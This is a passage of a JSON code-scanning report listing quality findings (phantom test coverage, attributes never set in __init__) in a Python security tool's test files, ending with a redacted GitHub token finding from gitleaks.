"Phantom test coverage: test_insight_is_frozen"}, "properties": {"repobilityId": 144923, "scanner": "repobility-ast-engine", "fingerprint": "4c234395732bc497364d965585a34b1a0a16e0e9a6574862e785b9643e6f9afa", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "phantom-test-coverage", "owasp": null, "cwe_ids": ["CWE-1126"], "languages": ["python"], "observations_count": 982154}, "scanner": "repobility-ast-engine", "correlation_key": "fp|4c234395732bc497364d965585a34b1a0a16e0e9a6574862e785b9643e6f9afa"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_insights.py"}, "region": {"startLine": 138}}}]}, {"ruleId": "MINED106", "level": "error", "message": {"text": "Phantom test coverage: test_version_flag"}, "properties": {"repobilityId": 144922, "scanner": "repobility-ast-engine", "fingerprint": "b2076a8cf55064722129ec837af8d5203b28cdabe9e3321947bf29ce5eaa133f", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "phantom-test-coverage", "owasp": null, "cwe_ids": ["CWE-1126"], "languages": ["python"], "observations_count": 982154}, "scanner": "repobility-ast-engine", "correlation_key": "fp|b2076a8cf55064722129ec837af8d5203b28cdabe9e3321947bf29ce5eaa133f"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_cli.py"}, "region": {"startLine": 251}}}]}, {"ruleId": "MINED106", "level": "error", "message": {"text": "Phantom test coverage: test_migration_idempotent_double_index_creation"}, "properties": {"repobilityId": 144921, "scanner": "repobility-ast-engine", "fingerprint": "be2cd2024646199808e5961f7ecb8147d01e921da307ebcc92f277e8262bd581", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "phantom-test-coverage", "owasp": null, "cwe_ids": ["CWE-1126"], "languages": ["python"], "observations_count": 982154}, "scanner": "repobility-ast-engine", "correlation_key": "fp|be2cd2024646199808e5961f7ecb8147d01e921da307ebcc92f277e8262bd581"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_approval_store_scale.py"}, "region": {"startLine": 584}}}]}, {"ruleId": "MINED106", "level": "error", "message": {"text": "Phantom test coverage: test_indexes_execute_without_error"}, "properties": {"repobilityId": 144920, "scanner": "repobility-ast-engine", "fingerprint": "1e0a178fc6b06f096b3ce5dbc07251077db77d452f34549704d680fe769ce8ab", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "phantom-test-coverage", "owasp": null, "cwe_ids": ["CWE-1126"], "languages": ["python"], "observations_count": 982154}, "scanner": "repobility-ast-engine", "correlation_key": "fp|1e0a178fc6b06f096b3ce5dbc07251077db77d452f34549704d680fe769ce8ab"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_approval_store_scale.py"}, "region": {"startLine": 161}}}]}, {"ruleId": "MINED106", "level": "error", "message": {"text": "Phantom test coverage: test_sync_supply_chain_bundle_wraps_runtime_error_when_cached_bundle_refetch_fails"}, "properties": {"repobilityId": 144918, "scanner": "repobility-ast-engine", "fingerprint": "c6a10fdf6f87cdee5de26a4bb284684f50c44502d2f33c03646213dc7287a13d", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "phantom-test-coverage", "owasp": null, "cwe_ids": ["CWE-1126"], "languages": ["python"], "observations_count": 982154}, "scanner": "repobility-ast-engine", "correlation_key": "fp|c6a10fdf6f87cdee5de26a4bb284684f50c44502d2f33c03646213dc7287a13d"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_supply_chain_sync.py"}, "region": {"startLine": 781}}}]}, {"ruleId": "MINED106", "level": "error", "message": {"text": "Phantom test coverage: test_scan_output_with_multiple_integrations_matches_schema"}, "properties": {"repobilityId": 144914, "scanner": "repobility-ast-engine", "fingerprint": "ced5882e7dc3388f41fd1bfaddefda18f0c2887268a18c2fd162808be69ca89b", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "phantom-test-coverage", "owasp": null, "cwe_ids": ["CWE-1126"], "languages": ["python"], "observations_count": 982154}, "scanner": "repobility-ast-engine", "correlation_key": "fp|ced5882e7dc3388f41fd1bfaddefda18f0c2887268a18c2fd162808be69ca89b"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_schema_contracts.py"}, "region": {"startLine": 40}}}]}, {"ruleId": "MINED106", "level": "error", "message": {"text": "Phantom test coverage: test_composition_result_is_frozen"}, "properties": {"repobilityId": 144913, "scanner": "repobility-ast-engine", "fingerprint": "0b6f8a18a7b29d5910796cb5fcc49c295dabb07ca3439ffd6ed65ed27ca2196f", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "phantom-test-coverage", "owasp": null, "cwe_ids": ["CWE-1126"], "languages": ["python"], "observations_count": 982154}, "scanner": "repobility-ast-engine", "correlation_key": "fp|0b6f8a18a7b29d5910796cb5fcc49c295dabb07ca3439ffd6ed65ed27ca2196f"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_bypass_detector.py"}, "region": {"startLine": 216}}}]}, {"ruleId": "MINED106", "level": "error", "message": {"text": "Phantom test coverage: test_send_websocket_handshake_rejects_oversized_headers_before_marker"}, "properties": {"repobilityId": 144905, "scanner": "repobility-ast-engine", "fingerprint": "a3fa9248212144b26c6ab24edd96abc2843bb9cf2638f9960061d33d379f1b14", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "phantom-test-coverage", "owasp": null, "cwe_ids": ["CWE-1126"], "languages": ["python"], "observations_count": 982154}, "scanner": "repobility-ast-engine", "correlation_key": "fp|a3fa9248212144b26c6ab24edd96abc2843bb9cf2638f9960061d33d379f1b14"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_codex_app_server.py"}, "region": {"startLine": 37}}}]}, {"ruleId": "MINED106", "level": "error", "message": {"text": "Phantom test coverage: test_read_websocket_frame_rejects_oversized_payload_before_reading"}, "properties": {"repobilityId": 144904, "scanner": "repobility-ast-engine", "fingerprint": "c4a7d7faf531440d037e08d742778c4228fbf0b66e584f474b5b4af3c71e804b", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "phantom-test-coverage", "owasp": null, "cwe_ids": ["CWE-1126"], "languages": ["python"], "observations_count": 982154}, "scanner": "repobility-ast-engine", "correlation_key": "fp|c4a7d7faf531440d037e08d742778c4228fbf0b66e584f474b5b4af3c71e804b"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_codex_app_server.py"}, "region": {"startLine": 30}}}]}, {"ruleId": "MINED106", "level": "error", "message": {"text": "Phantom test coverage: test_normalize_harness_payload_rejects_unknown_harness"}, "properties": {"repobilityId": 144901, "scanner": "repobility-ast-engine", "fingerprint": "6090cb1c4c8f86c6974f5c6b856f05effb7ae4b4fb575d3f4db8da6983da89e4", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "phantom-test-coverage", "owasp": null, "cwe_ids": ["CWE-1126"], "languages": ["python"], "observations_count": 982154}, "scanner": "repobility-ast-engine", "correlation_key": "fp|6090cb1c4c8f86c6974f5c6b856f05effb7ae4b4fb575d3f4db8da6983da89e4"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_runtime_action_harnesses.py"}, "region": {"startLine": 308}}}]}, {"ruleId": "MINED106", "level": "error", "message": {"text": "Phantom test coverage: test_result_is_frozen"}, "properties": {"repobilityId": 144899, "scanner": "repobility-ast-engine", "fingerprint": "c0b07235351aec0a0b86a14e16a22873dab8dbabb2383a4d9f76073a15394497", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "phantom-test-coverage", "owasp": null, "cwe_ids": ["CWE-1126"], "languages": ["python"], "observations_count": 982154}, "scanner": "repobility-ast-engine", "correlation_key": "fp|c0b07235351aec0a0b86a14e16a22873dab8dbabb2383a4d9f76073a15394497"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_redaction.py"}, "region": {"startLine": 113}}}]}, {"ruleId": "MINED108", "level": "error", "message": {"text": "`self.send_header` used but never assigned in __init__"}, "properties": {"repobilityId": 144898, "scanner": "repobility-ast-engine", "fingerprint": "8c2df6f4379cf7b394845f67bc78a3ef7f27a4ca3b7801688dd1cb362a57cead", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "self-attr-never-set", "owasp": null, "cwe_ids": ["CWE-476"], "languages": ["python"], "observations_count": 25998}, "scanner": "repobility-ast-engine", "correlation_key": "fp|8c2df6f4379cf7b394845f67bc78a3ef7f27a4ca3b7801688dd1cb362a57cead"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_event_schema_v1.py"}, "region": {"startLine": 86}}}]}, {"ruleId": "MINED108", "level": "error", "message": {"text": "`self.send_response` used but never assigned in __init__"}, "properties": {"repobilityId": 144897, "scanner": "repobility-ast-engine", "fingerprint": "0978b964b76bdd5802ee44baf0f36dc03af7d972ea796e74e042d11817bb259a", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "self-attr-never-set", "owasp": null, "cwe_ids": ["CWE-476"], "languages": ["python"], "observations_count": 25998}, "scanner": "repobility-ast-engine", "correlation_key": "fp|0978b964b76bdd5802ee44baf0f36dc03af7d972ea796e74e042d11817bb259a"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_event_schema_v1.py"}, "region": {"startLine": 85}}}]}, {"ruleId": "MINED108", "level": "error", "message": {"text": "`self.headers` used but never assigned in __init__"}, "properties": {"repobilityId": 144896, "scanner": "repobility-ast-engine", "fingerprint": "905903462ac25417f499e3206499d7161525ad2190af3c7a56e707195fa6dc57", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "self-attr-never-set", "owasp": null, "cwe_ids": ["CWE-476"], "languages": ["python"], "observations_count": 25998}, "scanner": "repobility-ast-engine", "correlation_key": "fp|905903462ac25417f499e3206499d7161525ad2190af3c7a56e707195fa6dc57"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_event_schema_v1.py"}, "region": {"startLine": 51}}}]}, {"ruleId": "MINED108", "level": "error", "message": {"text": "`self.wfile` used but never assigned in __init__"}, "properties": {"repobilityId": 144895, "scanner": "repobility-ast-engine", "fingerprint": "94691fda0a0d230926341ab28dca6ff427969539316ccb24745017744a78b573", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "self-attr-never-set", "owasp": null, "cwe_ids": ["CWE-476"], "languages": ["python"], "observations_count": 25998}, "scanner": "repobility-ast-engine", "correlation_key": "fp|94691fda0a0d230926341ab28dca6ff427969539316ccb24745017744a78b573"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_event_schema_v1.py"}, "region": {"startLine": 59}}}]}, {"ruleId": "MINED108", "level": "error", "message": {"text": "`self.path` used but never assigned in __init__"}, "properties": {"repobilityId": 144894, "scanner": "repobility-ast-engine", "fingerprint": "5dc6c01af72176424c66a305da22d3f043d507cbf64d87b0d1805f3985e026b8", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "self-attr-never-set", "owasp": null, "cwe_ids": ["CWE-476"], "languages": ["python"], "observations_count": 25998}, "scanner": "repobility-ast-engine", "correlation_key": "fp|5dc6c01af72176424c66a305da22d3f043d507cbf64d87b0d1805f3985e026b8"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_event_schema_v1.py"}, "region": {"startLine": 54}}}]}, {"ruleId": "MINED108", "level": "error", "message": {"text": "`self.rfile` used but never assigned in __init__"}, "properties": {"repobilityId": 144893, "scanner": "repobility-ast-engine", "fingerprint": "b2ca698ead7938498db79acafa86d1e9a864662b96b875c8df9d61238e399583", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "self-attr-never-set", "owasp": null, "cwe_ids": ["CWE-476"], "languages": ["python"], "observations_count": 25998}, "scanner": "repobility-ast-engine", "correlation_key": "fp|b2ca698ead7938498db79acafa86d1e9a864662b96b875c8df9d61238e399583"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_event_schema_v1.py"}, "region": {"startLine": 45}}}]}, {"ruleId": "MINED108", "level": "error", "message": {"text": "`self.headers` used but never assigned in __init__"}, "properties": {"repobilityId": 144892, "scanner": "repobility-ast-engine", "fingerprint": "9ec5d35e641ba4b246fe94fbab8e356be5ead54a01f0c93aec722f1d74606bb4", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "self-attr-never-set", "owasp": null, "cwe_ids": ["CWE-476"], "languages": ["python"], "observations_count": 25998}, "scanner": "repobility-ast-engine", "correlation_key": "fp|9ec5d35e641ba4b246fe94fbab8e356be5ead54a01f0c93aec722f1d74606bb4"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_event_schema_v1.py"}, "region": {"startLine": 44}}}]}, {"ruleId": "MINED108", "level": "error", "message": {"text": "`self.wfile` used but never assigned in __init__"}, "properties": {"repobilityId": 144891, "scanner": "repobility-ast-engine", "fingerprint": "a5176e0852630127b8e16e223830c33699fa0b6be3de2302465ab94fa3a5f630", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "self-attr-never-set", "owasp": null, "cwe_ids": ["CWE-476"], "languages": ["python"], "observations_count": 25998}, "scanner": "repobility-ast-engine", "correlation_key": "fp|a5176e0852630127b8e16e223830c33699fa0b6be3de2302465ab94fa3a5f630"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_event_schema_v1.py"}, "region": {"startLine": 74}}}]}, {"ruleId": "MINED108", "level": "error", "message": {"text": "`self.path` used but never assigned in __init__"}, "properties": {"repobilityId": 144890, "scanner": "repobility-ast-engine", "fingerprint": "0fe5fe3f414382d132c4333369442e77e4440573019eff8d01d36a8bace819f8", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "self-attr-never-set", "owasp": null, "cwe_ids": ["CWE-476"], "languages": ["python"], "observations_count": 25998}, "scanner": "repobility-ast-engine", "correlation_key": "fp|0fe5fe3f414382d132c4333369442e77e4440573019eff8d01d36a8bace819f8"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_event_schema_v1.py"}, "region": {"startLine": 61}}}]}, {"ruleId": "MINED108", "level": "error", "message": {"text": "`self.path` used but never assigned in __init__"}, "properties": {"repobilityId": 144889, "scanner": "repobility-ast-engine", "fingerprint": "932963399a374e8cf44b6d13ead0017214aec692aa9808e79642832b8f6251ae", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "self-attr-never-set", "owasp": null, "cwe_ids": ["CWE-476"], "languages": ["python"], "observations_count": 25998}, "scanner": "repobility-ast-engine", "correlation_key": "fp|932963399a374e8cf44b6d13ead0017214aec692aa9808e79642832b8f6251ae"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_event_schema_v1.py"}, "region": {"startLine": 49}}}]}, {"ruleId": "MINED108", "level": "error", "message": {"text": "`self.end_headers` used but never assigned in __init__"}, "properties": {"repobilityId": 144888, "scanner": "repobility-ast-engine", "fingerprint": "5c602c8f4df09f286aa534341ff84bbebdee77992245771cab8dda682d9dc6de", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "self-attr-never-set", "owasp": null, "cwe_ids": ["CWE-476"], "languages": ["python"], "observations_count": 25998}, "scanner": "repobility-ast-engine", "correlation_key": "fp|5c602c8f4df09f286aa534341ff84bbebdee77992245771cab8dda682d9dc6de"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_event_schema_v1.py"}, "region": {"startLine": 57}}}]}, {"ruleId": "MINED108", "level": "error", "message": {"text": "`self.send_header` used but never assigned in __init__"}, "properties": {"repobilityId": 144887, "scanner": "repobility-ast-engine", "fingerprint": "e5fd20d0b6bafa0f624405db74bc1222a703ad37c829d52ae540b600513ccf5f", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "self-attr-never-set", "owasp": null, "cwe_ids": ["CWE-476"], "languages": ["python"], "observations_count": 25998}, "scanner": "repobility-ast-engine", "correlation_key": "fp|e5fd20d0b6bafa0f624405db74bc1222a703ad37c829d52ae540b600513ccf5f"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_event_schema_v1.py"}, "region": {"startLine": 56}}}]}, {"ruleId": "MINED108", "level": "error", "message": {"text": "`self.send_response` used but never assigned in __init__"}, "properties": {"repobilityId": 144886, "scanner": "repobility-ast-engine", "fingerprint": "9d464c5ef0e1c8e3cc4f3f6cb7b58bbc220cbcb1ded21621818028f477521c4e", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "self-attr-never-set", "owasp": null, "cwe_ids": ["CWE-476"], "languages": ["python"], "observations_count": 25998}, "scanner": "repobility-ast-engine", "correlation_key": "fp|9d464c5ef0e1c8e3cc4f3f6cb7b58bbc220cbcb1ded21621818028f477521c4e"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_event_schema_v1.py"}, "region": {"startLine": 55}}}]}, {"ruleId": "MINED108", "level": "error", "message": {"text": "`self.rfile` used but never assigned in __init__"}, "properties": {"repobilityId": 144885, "scanner": "repobility-ast-engine", "fingerprint": "d893aeb73920d18427f5479482dc7f343c6be41ff10345269e3f53a247c8e26a", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "self-attr-never-set", "owasp": null, "cwe_ids": ["CWE-476"], "languages": ["python"], "observations_count": 25998}, "scanner": "repobility-ast-engine", "correlation_key": "fp|d893aeb73920d18427f5479482dc7f343c6be41ff10345269e3f53a247c8e26a"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_protect.py"}, "region": {"startLine": 34}}}]}, {"ruleId": "MINED108", "level": "error", "message": {"text": "`self.headers` used but never assigned in __init__"}, "properties": {"repobilityId": 144884, "scanner": "repobility-ast-engine", "fingerprint": "f3e6492f5060e6ee6c0fac2981a70dac42f83da400809d7f08b4fbd80a7242bc", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "self-attr-never-set", "owasp": null, "cwe_ids": ["CWE-476"], "languages": ["python"], "observations_count": 25998}, "scanner": "repobility-ast-engine", "correlation_key": "fp|f3e6492f5060e6ee6c0fac2981a70dac42f83da400809d7f08b4fbd80a7242bc"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_protect.py"}, "region": {"startLine": 32}}}]}, {"ruleId": "MINED108", "level": "error", "message": {"text": "`self.wfile` used but never assigned in __init__"}, "properties": {"repobilityId": 144883, "scanner": "repobility-ast-engine", "fingerprint": "71bc94a8fbbbfeda5b207f600b174d420e415ba2c6e54a54a8c525c83d79b98d", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "self-attr-never-set", "owasp": null, "cwe_ids": ["CWE-476"], "languages": ["python"], "observations_count": 25998}, "scanner": "repobility-ast-engine", "correlation_key": "fp|71bc94a8fbbbfeda5b207f600b174d420e415ba2c6e54a54a8c525c83d79b98d"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_protect.py"}, "region": {"startLine": 38}}}]}, {"ruleId": "MINED108", "level": "error", "message": {"text": "`self.end_headers` used but never assigned in __init__"}, "properties": {"repobilityId": 144882, "scanner": "repobility-ast-engine", "fingerprint": "52fb78b59169961a56ea6ef000572dc55f3d0bbabacefff9e7ae69abd4a6429c", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "self-attr-never-set", "owasp": null, "cwe_ids": ["CWE-476"], "languages": ["python"], "observations_count": 25998}, "scanner": "repobility-ast-engine", "correlation_key": "fp|52fb78b59169961a56ea6ef000572dc55f3d0bbabacefff9e7ae69abd4a6429c"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_protect.py"}, "region": {"startLine": 37}}}]}, {"ruleId": "MINED108", "level": "error", "message": {"text": "`self.send_header` used but never assigned in __init__"}, "properties": {"repobilityId": 144881, "scanner": "repobility-ast-engine", "fingerprint": "80a4a5dbd05e3e756be7dbd190cf88420f355647561e4cb7cce1132889931f7f", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "self-attr-never-set", "owasp": null, "cwe_ids": ["CWE-476"], "languages": ["python"], "observations_count": 25998}, "scanner": "repobility-ast-engine", "correlation_key": "fp|80a4a5dbd05e3e756be7dbd190cf88420f355647561e4cb7cce1132889931f7f"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_protect.py"}, "region": {"startLine": 36}}}]}, {"ruleId": "MINED108", "level": "error", "message": {"text": "`self.send_response` used but never assigned in __init__"}, "properties": {"repobilityId": 144880, "scanner": "repobility-ast-engine", "fingerprint": "0480a6debac668e00f2c02c982ab685322065fb3363516ae44224ef9dac76bd9", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "self-attr-never-set", "owasp": null, "cwe_ids": ["CWE-476"], "languages": ["python"], "observations_count": 25998}, "scanner": "repobility-ast-engine", "correlation_key": "fp|0480a6debac668e00f2c02c982ab685322065fb3363516ae44224ef9dac76bd9"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_protect.py"}, "region": {"startLine": 35}}}]}, {"ruleId": "MINED108", "level": "error", "message": {"text": "`self._benign_fixtures` used but never assigned in __init__"}, "properties": {"repobilityId": 144879, "scanner": "repobility-ast-engine", "fingerprint": "771aa07fe396736ced9a485077dec66198d10dbdfaee36f32546494b9817f0aa", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "self-attr-never-set", "owasp": null, "cwe_ids": ["CWE-476"], "languages": ["python"], "observations_count": 25998}, "scanner": "repobility-ast-engine", "correlation_key": "fp|771aa07fe396736ced9a485077dec66198d10dbdfaee36f32546494b9817f0aa"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_red_team.py"}, "region": {"startLine": 158}}}]}, {"ruleId": "MINED108", "level": "error", "message": {"text": "`self._benign_fixtures` used but never assigned in __init__"}, "properties": {"repobilityId": 144878, "scanner": "repobility-ast-engine", "fingerprint": "a57d932437d455739d84632fd83159b7ccd0521f08f5cc2edad162e007e40725", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "self-attr-never-set", "owasp": null, "cwe_ids": ["CWE-476"], "languages": ["python"], "observations_count": 25998}, "scanner": "repobility-ast-engine", "correlation_key": "fp|a57d932437d455739d84632fd83159b7ccd0521f08f5cc2edad162e007e40725"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_red_team.py"}, "region": {"startLine": 150}}}]}, {"ruleId": "MINED108", "level": "error", "message": {"text": "`self._benign_fixtures` used but never assigned in __init__"}, "properties": {"repobilityId": 144877, "scanner": "repobility-ast-engine", "fingerprint": "c35b61f6fd236aa7160e0f3a77b74b75b09c5adab9d1553bf3be3479979a64d7", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "self-attr-never-set", "owasp": null, "cwe_ids": ["CWE-476"], "languages": ["python"], "observations_count": 25998}, "scanner": "repobility-ast-engine", "correlation_key": "fp|c35b61f6fd236aa7160e0f3a77b74b75b09c5adab9d1553bf3be3479979a64d7"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_red_team.py"}, "region": {"startLine": 143}}}]}, {"ruleId": "MINED108", "level": "error", "message": {"text": "`self._malicious_fixtures` used but never assigned in __init__"}, "properties": {"repobilityId": 144876, "scanner": "repobility-ast-engine", "fingerprint": "9307483059cb25282cc3acc829465c7a9fb96dae5ddc27c969be267107a9d3e1", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "self-attr-never-set", "owasp": null, "cwe_ids": ["CWE-476"], "languages": ["python"], "observations_count": 25998}, "scanner": "repobility-ast-engine", "correlation_key": "fp|9307483059cb25282cc3acc829465c7a9fb96dae5ddc27c969be267107a9d3e1"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_red_team.py"}, "region": {"startLine": 125}}}]}, {"ruleId": "MINED108", "level": "error", "message": {"text": "`self._malicious_fixtures` used but never assigned in __init__"}, "properties": {"repobilityId": 144875, "scanner": "repobility-ast-engine", "fingerprint": "efae4921c7074ab5ebe5b7bf03c24118557383ad0f80588d1942e9ff1089d37d", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "self-attr-never-set", "owasp": null, "cwe_ids": ["CWE-476"], "languages": ["python"], "observations_count": 25998}, "scanner": "repobility-ast-engine", "correlation_key": "fp|efae4921c7074ab5ebe5b7bf03c24118557383ad0f80588d1942e9ff1089d37d"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_red_team.py"}, "region": {"startLine": 117}}}]}, {"ruleId": "MINED108", "level": "error", "message": {"text": "`self._malicious_fixtures` used but never assigned in __init__"}, "properties": {"repobilityId": 144874, "scanner": "repobility-ast-engine", "fingerprint": "79982cffef3546c5bbf5fdb8d943c7debf6f1ecebd799c8d8ebae54a03e34fd3", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "self-attr-never-set", "owasp": null, "cwe_ids": ["CWE-476"], "languages": ["python"], "observations_count": 25998}, "scanner": "repobility-ast-engine", "correlation_key": "fp|79982cffef3546c5bbf5fdb8d943c7debf6f1ecebd799c8d8ebae54a03e34fd3"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_red_team.py"}, "region": {"startLine": 98}}}]}, {"ruleId": "MINED106", "level": "error", "message": {"text": "Phantom test coverage: test_one_input"}, "properties": {"repobilityId": 144873, "scanner": "repobility-ast-engine", "fingerprint": "59de520859315b7b50f46962b4aac44d5502ff79ccdeecd3594adce6261d6be6", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "phantom-test-coverage", "owasp": null, "cwe_ids": ["CWE-1126"], "languages": ["python"], "observations_count": 982154}, "scanner": "repobility-ast-engine", "correlation_key": "fp|59de520859315b7b50f46962b4aac44d5502ff79ccdeecd3594adce6261d6be6"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "fuzzers/manifest_fuzzer.py"}, "region": {"startLine": 9}}}]}, {"ruleId": "github-pat", "level": "error", "message": {"text": "Uncovered a GitHub Personal Access Token, potentially leading to unauthorized repository access and sensitive content exposure."}, "properties": {"repobilityId": 145062, "scanner": "gitleaks", "fingerprint": "905e53e2d13c9100d835138606ea6f382ae1a884f735fb057810aa9b7dff8ce4", "category": "credential_exposure", "severity": "critical", "confidence": 0.95, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"match": "REDACTED", "rule_id": "github-pat", "scanner": "gitleaks", "detector": "github-pat", "correlation_key": "secret|tests/test_guard_runtime.py|1814|redacted"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_runtime.py"}, "region": 